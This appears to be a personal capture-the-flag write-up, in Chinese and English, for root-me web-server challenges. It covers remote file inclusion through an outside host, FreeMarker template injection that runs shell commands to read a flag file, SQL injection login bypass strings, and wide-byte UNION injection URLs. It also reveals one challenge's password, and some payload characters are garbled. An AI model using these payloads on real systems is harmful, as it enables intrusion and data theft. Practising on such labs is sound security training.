root-me web server 20-30 writeup
Remote File Inclusion-远程文件包含
Get the PHP source code.
ctrl+u
进行RFI攻击需要同时具备三个条件(被攻击机器):
allow_url_fopen = On (默认开启)
allow_url_include = On (默认关闭)
被包含的变量前没有目录的限制
view-source:http://challenge01.root-me.org/web-serveur/ch13/?lang=http://7xspti.com2.z0.glb.clouddn.com/123
Server-side Template Injection-服务器端模板注入
Java EE
Exploit the vulnerability in order to retrieve the validation password in the file SECRET_FLAG.txt.
对输入过滤不严格
${2*3}
说明执行了
<#assign ex="freemarker.template.utility.Execute"?new()>
${ ex("ls -l") }
找目录SECRET_FLAG.txt
查看选中部分源码
<#assign ex="freemarker.template.utility.Execute"?new()>
${ ex("cat ../SECRET_FLAG.txt") }
SQL injection - authentication
Retrieve the administrator password
ctrl+u
使用万能密钥
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
密码123456
ctrl+u
type="password" value="t0_W34k!$"
SQL injection - authentication - GBK
宽字节注入
http://challenge01.root-me.org/web-serveur/ch42/index.php?id=1�\'
http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1�\'
http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1�\'Union(select(1),2,3,4,5,6,7,8)%23
http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1�\'Union(select(1),version(),3,4,5,6,7,8)%23
SQL injection - string-字符型注入
Retrieve the administrator password
http://challenge01.root-me.org/web-serveur/ch19/?action=news&news_id=1
正常
http://challenge01.root-me.org/web-serveur/ch19/?action=news&news_id=1'
报错
𖠂’ OR 1=1 /*
SELECT * FROM test WHERE name = '𖠂’ OR 1=1 /*’ LIMIT 1
欢迎访问我的独立博客:joy_nick
